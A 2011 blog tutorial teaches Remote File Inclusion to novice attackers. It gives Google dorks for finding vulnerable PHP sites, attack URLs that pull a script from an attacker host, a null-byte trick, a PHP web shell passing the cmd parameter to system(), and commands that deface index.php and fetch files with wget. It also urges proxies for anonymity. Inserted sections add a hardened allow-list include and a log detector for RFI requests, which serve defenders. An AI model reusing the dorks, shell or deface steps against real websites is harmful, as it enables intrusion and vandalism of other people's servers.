Monday, May 30, 2011

Hacking with RFI

Remote File Inclusion
Ever heard of RFI? Well, this is the guide on how to do it!


Introduction


RFI stands for Remote File Inclusion. It lets an attacker make a vulnerable web application fetch a file from a server the attacker controls and execute it as server-side code (PHP, in practically every real case). The vulnerability comes from poor validation: a script passes a user-supplied parameter straight into an include. The result is code execution on the web server; the JavaScript alert you will see later is just a visible side effect of that, not a separate XSS bug in the site.

Whoa there buddy, that was pretty technical. If you didn't follow that, either because you're new to hacking or a script kiddie, calm down. Put in the simplest of terms, we can use this method to run our own code on the target's web server, which among other things lets us deface the website. Yay! Script kiddies rejoice!

Now, before you go all "get back to the SQLi" on me, let me just say, RFI is an extremely common bug in PHP applications. It's arguably as common as SQLi, just a whole lot less famous. If anything, RFI is easier than SQLi, and if you follow this tutorial it really doesn't require much skill at all.

Using RFI you can deface a website, steal sensitive information, get a shell on the server, and really have your way with it (within whatever permissions the web server process has).

Without further ado, let's begin.


What You Need to Know


It's not required, but highly suggested, to have some hacking experience. I know I said it was "easier than SQLi", but that's only half true. Once you become a good hacker you'll find RFI insanely simple (and super fun/easy), however in some ways it is a bit more complex and involved as far as programming goes, since the payload you include is a PHP script you have to understand.

With this tutorial it won't be hard to follow along, but you will need to pay attention.

It's also likely you'll want some experience using a computer, and some experience programming. By the way, when I say "programming", I mean everything from markup to scripting to assembly.
For RFI it helps to know HTML, Bash, and especially PHP, since the file you include is executed as PHP. You can learn all of them easily online.


D.I.Y. Tutorial


This is a D.I.Y. (do it yourself) tutorial, meaning that after reading this tutorial, or just following along with it, you will be ready to perform this exploit. I would highly suggest that you completely read and understand the entire tutorial prior to beginning.

Remember, if you are actually performing RFI to use a proxy and protect your identity - stay anonymous. Also, please read the disclaimer before beginning.

The first step is to find a vulnerable website. You can do this very quickly and easily by using Google dorks: search strings built from the parameter names that known-vulnerable scripts pass straight into include().
Here are five dorks to get you started (each on its own line), however there are literally thousands more.
Code:
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=

If you don't know how to use Google dorks, well, you really better learn how, as they're vital to any form of hacking (and even just effectively using Google). There's no sense in reinventing the wheel in this tutorial.

Okay, let's assume that we have successfully located an exploitable website (a website vulnerable to RFI). 
For now, we'll call our victim site (the site we are exploiting) "http://victimsite.com/" and our own site (the hacker's site) "http://hackersite.com/".

So, let's say we have our website:
Code:
http://victimsite.com/index.php?page=home
This website pulls documents stored as text files from the server and renders them as web pages. The "page" parameter is handed to PHP's include function, and that is exactly what we can abuse: include accepts a URL as well as a local path, as long as the server's allow_url_include setting is on.

Let's check it out...

Code:
http://victimsite.com/index.php?page=http://hackersite.com/badscript.txt
In that code section you can see what we're doing. We are including a file called "badscript.txt"; we can assume that inside is a bad (malicious) PHP script. It is served with a .txt extension on purpose: if it were badscript.php, our own server would execute it and send the victim only the output, not the PHP source that the victim's include needs.

We can actually break this down into a few parts, for clarity purposes:

http://victimsite.com/index.php?page=http://hackersite.com/badscript.txt

The first part, up to and including "?page=", is the victim's original site: the exploitable site that we found through Google dorks, and the parameter it passes to include.

Next comes our site, or the "hacker's site", http://hackersite.com/. This is a site owned/controlled by a hacker and reachable from the victim's server.

And finally there is the "bad script", badscript.txt, which is the malicious script we'll be including in our attack. badscript.txt is the Remote File in Remote File Inclusion, and the whole URL makes up the inclusion.

Now, if it truly is a vulnerable website, one of three cases will happen:
  • Case 1 - You might have noticed that the original URL, "page=home", had no extension, but the URL I requested ends in ".txt". The site may give an error mentioning "badscript.txt.txt", which tells you it appends .txt to every page name it loads from the server. In that case request http://hackersite.com/badscript instead and let the site add the extension.
  • Case 2 - The site appends something along the lines of .php instead. Here the classic trick is a null byte, "%00", at the end of the URL (page=http://hackersite.com/badscript.txt%00), so the path is cut off before the appended extension. Be aware this only works on PHP older than 5.3.4; later versions refuse to include a path that contains a null byte.
  • Case 3 – Successful execution - you hacked it.
If instead you see a warning like "http:// wrapper is disabled in the server configuration by allow_url_include=0", remote inclusion is switched off on that server (it has been the default since PHP 5.2) and no amount of fiddling with extensions will change that; at most you are looking at a local file inclusion.
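As an added example (not code from the original post), here is the kind of index.php the tutorial assumes, next to a hardened version of the same lookup. The allow-list entries and the pages/ file names are assumptions for illustration; it needs PHP 7 or later to run:

```php
<?php
// Added example, not from the original post: the include pattern the tutorial
// exploits, beside a hardened version. The page list and file names are assumed.

// VULNERABLE: resolve "page" the way the tutorial's site does (Case 2 in the
// text: a fixed extension is appended). With allow_url_include=On,
// ?page=http://hackersite.com/badscript.txt%00 fetched the remote .txt and ran
// it as PHP on versions before 5.3.4, because the path was cut at the null byte.
// Prepending a fixed directory would stop the remote include but still allow
// "../" traversal, so it is not a fix either.
function vulnerablePagePath(string $page): string
{
    return $page . '.php';
}

// HARDENED: treat the parameter as a lookup key, never as a path. Anything not
// in the allow-list is rejected, so URLs, "../" and %00 never reach include().
function safePagePath(string $page): ?string
{
    $allowed = [
        'home'  => 'pages/home.php',
        'about' => 'pages/about.php',
    ];
    return $allowed[$page] ?? null;
}

// Inputs from the tutorial (constructed for this demo).
$inputs = [
    'home',
    'http://hackersite.com/badscript.txt',
    "http://hackersite.com/badscript.txt\0",   // what %00 decodes to
];

foreach ($inputs as $page) {
    // Show the null byte visibly instead of printing a raw NUL.
    $shown = str_replace("\0", '\0', vulnerablePagePath($page));
    printf("vulnerable include target: %s\n", $shown);
    printf("hardened include target:   %s\n", safePagePath($page) ?? '(rejected)');
}

// With the hardened lookup, index.php would do:
//   $path = safePagePath($_GET['page'] ?? 'home');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
// and php.ini should keep the default allow_url_include = Off (and
// allow_url_fopen = Off as well if nothing on the site legitimately reads URLs).
```

Running it shows the remote URL (with or without the trailing null byte) being turned into an include target by the vulnerable function, while the hardened function returns a path only for "home" and rejects everything else.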

Now, once you have battled your way around that, you'll want to know what to put inside the script. You can grab a ready-made PHP shell such as the infamous C99 (bloated, but highly effective once deployed), or code yourself a new one. For this, knowledge of PHP comes in handy.

Examine the code below:

Code:
<?php

// Proof that our PHP ran on the server: the victim's page comes back with this
// script tag in it, so an alert pops up in our browser.
echo "<script>alert('U 4r3 0wn3d !!');</script>";
// Echo the command back so we can see what was run.
echo "Run command: ".htmlspecialchars($_GET['cmd']);

// Run it as the web server's user (system() goes through /bin/sh).
system($_GET['cmd']);

?>
The above code is what the victim's include() will execute. The alert line is a quick proof that your PHP actually ran on the server: the alert pops up in your own browser because the victim's page is sent back with your script's output in it (it is not an XSS bug on the site). If that works, the system() line lets you send shell commands to the Linux server through the cmd parameter; they run as the web server's user via /bin/sh.

So, if you're in luck and it worked, let's try some Linux commands. For example, to find the current working directory on the server and then list the files in it, we use the "pwd" and "ls" commands:

Code:
http://victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/badscript.txt

http://victimsite.com/index.php?cmd=ls&page=http://hackersite.com/badscript.txt
The cmd parameter is read by the script we included (it is the $_GET['cmd'] in the code above): every parameter of the request goes to the victim's index.php, and our script sees them all because it runs inside that same request. So the server prints its working directory and lists the documents in it. Even better, you can make the page proclaim that you hacked it by using the "echo" command:

Code:
cmd=echo HACKED> index.php
(URL-encoded in the actual request: cmd=echo%20HACKED%3E%20index.php.) This overwrites index.php, so the site now renders the word HACKED. It only works if the web server's user has write permission on that file, which is often, but not always, the case. If it's a primitive website that stores pages as .txt files, you'll want to overwrite the .txt files instead. Now, as expected, we are the alpha and the omega of the website: we can download, remove, rename, anything the web server's account is allowed to do.
Want to download stuff? Try the "wget" command ("cmd=wget..." get the idea?). Want to move it out? Try the "mv" command.
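From the defender's side, an added example (not part of the original post) that flags exactly the requests above in Apache-style access logs. The four log lines are constructed for the demo, and the IPs and hostnames in them are placeholders:

```php
<?php
// Added example, not from the original post: spot RFI attempts in web server
// access logs. Log lines are constructed; addresses and hostnames are placeholders.

$logLines = [
    '203.0.113.5 - - [30/May/2011:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/May/2011:10:01:09 +0000] "GET /index.php?page=http://hackersite.com/badscript.txt HTTP/1.1" 200 812',
    '203.0.113.7 - - [30/May/2011:10:01:15 +0000] "GET /index.php?cmd=ls&page=http://hackersite.com/badscript.txt%00 HTTP/1.1" 200 1440',
    '203.0.113.9 - - [30/May/2011:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 4990',
];

// Return a list of indicator strings for one log line; an empty list means clean.
function rfiIndicators(string $line): array
{
    $hits = [];
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\//', $line, $m)) {
        return $hits;                       // not a request line we understand
    }
    $qpos = strpos($m[1], '?');
    if ($qpos === false) {
        return $hits;                       // no query string, nothing to inspect
    }
    foreach (explode('&', substr($m[1], $qpos + 1)) as $pair) {
        $parts = explode('=', $pair, 2);
        $name  = $parts[0];
        $value = rawurldecode($parts[1] ?? '');   // so %3A%2F%2F and %00 become visible

        // A value that starts with a URL scheme is the RFI signature itself.
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
            $hits[] = "$name=<remote URL>";
        }
        // A null byte means someone is trying the extension-truncation trick.
        if (strpos($value, "\0") !== false) {
            $hits[] = "$name contains %00";
        }
        // The tutorial's shell takes its command from "cmd"; a site that never
        // uses such a parameter should never see one.
        if (strcasecmp($name, 'cmd') === 0) {
            $hits[] = 'cmd=' . addcslashes($value, "\0..\37");
        }
    }
    return $hits;
}

foreach ($logLines as $line) {
    $hits = rfiIndicators($line);
    $ip   = strtok($line, ' ');             // client address is the first field
    echo $hits ? "ALERT $ip: " . implode('; ', $hits) . "\n"
               : "ok    $ip\n";
}
```

The two requests from 203.0.113.7 are flagged (remote URL in page, then cmd plus the null byte), while the plain "home" and "about" requests pass. Decoding the value before matching matters: an attacker can hide "http://" as %68%74%74%70%3A%2F%2F and a literal-string match would miss it.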

The rest is up to your own brilliant mind.


Disclaimer


RFI (remote file inclusion) is a form of illegal hacking. It is illegal to gain entry to websites without proper permission from the owner of the website and web server. Any hacking techniques in this thread are for educational purposes only. I do not support or partake in illegal hacking. I am not responsible for your actions (or the actions of others). I am not responsible for the consequences of your actions (or the consequences of others). I am not accountable/responsible for how you use this guide.



